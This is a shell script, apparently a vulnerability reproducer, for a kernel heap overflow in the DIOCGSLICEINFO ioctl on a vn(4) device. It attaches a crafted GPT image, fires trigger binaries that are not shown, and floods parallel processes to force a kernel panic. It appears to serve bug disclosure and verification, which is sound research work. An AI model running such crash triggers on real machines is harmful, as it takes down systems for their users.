DF-0074 / run.sh
#!/bin/sh
# DF-0074 reproducer driver: attaches the crafted GPT image to a vn(4) device,
# issues the DIOCGSLICEINFO ioctl that overruns the heap, and then churns the
# slab zones so the resulting corruption surfaces as a panic.
#
# Privilege: must be run as root. Under the default devfs ruleset /dev/vn0* is
# root:operator crw-r-----, so an unprivileged caller fails with EACCES at
# open(2) -- see VERDICT.md "Reachability".
#
# Outcome: the panic is asynchronous (slab_cleanup fires after the trigger
# process has exited), so this script can return normally before the guest
# freezes. The evidence to check is dfbsd-qemu/boot.log, not this script's
# exit status.
#
# Usage (as root on the guest): ./run.sh [vn_device]
#   vn_device  name of the vn(4) unit to use (default: vn0)

# Print a section heading in the "=== ... ===" form used throughout.
banner() {
  echo "=== $1 ==="
}

# Print "<step> rc=<status>" for the step that just ran.
report() {
  echo "$1 rc=$2"
}

DEV=${1:-vn0}

# Work relative to the script so ./overflow.img, ./trigger and
# ./trigger_stress resolve regardless of the caller's cwd.
cd "$(dirname "$0")"

banner "attaching crafted GPT image (128 entries) to $DEV"
vnconfig -c "$DEV" ./overflow.img
report attach $?
# Glob is deliberately unquoted: list every node devfs created for the unit,
# capped at 20 lines.
ls /dev/${DEV}* 2>&1 | head -20
echo

banner "single DIOCGSLICEINFO (proves overflow: nslices should be 130)"
./trigger /dev/${DEV}s1
report trigger $?
echo

banner "stress: 5 ioctl+fd-churn iters + fork/exit churn (induces panic)"
./trigger_stress /dev/${DEV}s1 5
report stress $?
echo

banner "parallel flood (16 procs) to churn slab zones hit by the overrun"
remaining=16
while [ "$remaining" -gt 0 ]; do
  ./trigger /dev/${DEV}s1 >/dev/null 2>&1 &
  remaining=$((remaining - 1))
done
# wait(1) with no operands returns 0 once every background job has been
# reaped, so the status reported here marks completion of the barrier rather
# than any individual trigger's exit code.
wait
report flood $?
echo

banner "if the guest is still up, the async slab_cleanup panic will follow;"
banner "check dfbsd-qemu/boot.log for: 'Fatal trap 12 ... slab_cleanup'"
# Best-effort detach; errors are suppressed because the unit may already be
# gone (or the guest may be wedged) by this point.
vnconfig -u "$DEV" 2>/dev/null || true